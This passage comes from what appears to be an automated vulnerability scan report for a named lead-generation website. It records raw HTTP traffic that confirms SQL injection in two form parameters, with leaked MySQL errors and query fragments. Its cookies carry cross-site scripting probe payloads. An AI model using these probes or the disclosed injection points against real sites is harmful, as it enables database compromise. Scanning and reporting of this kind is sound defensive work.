Cookie: JSESSIONID=7DCBAF96E588A764816BB2D777B6D36B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 07:00:23 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=pts35u09c3j3dvug26j5s9e4m7; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 16242


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.295. http://www.insideup.com/ppc/leadflow/fist00/project.php [emailaddress parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/fist00/project.php

Issue detail

The emailaddress parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the emailaddress parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_452%5B%5D=2936__Financial+statement+creation&attributeId_453=2944__No+-+No+preference&attributeId_454=2948__Not+sure&attributeId_455=2955__ASAP&attributeId_456=2961__Still+in+the+planning+stages&attributeId_457=2968__Less+than+%24100%2c000&button3=Submit&companyname=Company+Name&emailaddress=Email'&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=10003&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=7DCBAF96E588A764816BB2D777B6D36B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 07:00:35 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=42a2ukst6dbut3523kd0o40fc2; path=/
Content-Length: 6510
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
s&attributeId_457=2968__Less than $100,000&button3=Submit&companyname=Company Name&emailaddress=Email'&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=10003&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&lastname=Last Name&phone=Phone&subcategoryId=10003&website=n/a&zip=Zip code' at line 5

Request 2

GET /ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_452%5B%5D=2936__Financial+statement+creation&attributeId_453=2944__No+-+No+preference&attributeId_454=2948__Not+sure&attributeId_455=2955__ASAP&attributeId_456=2961__Still+in+the+planning+stages&attributeId_457=2968__Less+than+%24100%2c000&button3=Submit&companyname=Company+Name&emailaddress=Email''&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=10003&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=7DCBAF96E588A764816BB2D777B6D36B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 07:00:36 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=9mvqh1342id0glc50qhd8dmnm4; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 16242


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.296. http://www.insideup.com/ppc/leadflow/fist00/project.php [firstname parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/fist00/project.php

Issue detail

The firstname parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the firstname parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_452%5B%5D=2936__Financial+statement+creation&attributeId_453=2944__No+-+No+preference&attributeId_454=2948__Not+sure&attributeId_455=2955__ASAP&attributeId_456=2961__Still+in+the+planning+stages&attributeId_457=2968__Less+than+%24100%2c000&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name'&lastname=Last+Name&phone=Phone&subcategoryId=10003&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=7DCBAF96E588A764816BB2D777B6D36B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 07:00:47 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=14qchkug8gj1e4lc8qu02mq3v6; path=/
Content-Length: 6510
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
s&attributeId_457=2968__Less than $100,000&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name'&lastname=Last Name&phone=Phone&subcategoryId=10003&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&phone=Phone&subcategoryId=10003&website=n/a&zip=Zip code' OR prj.project_pa' at line 5

Request 2

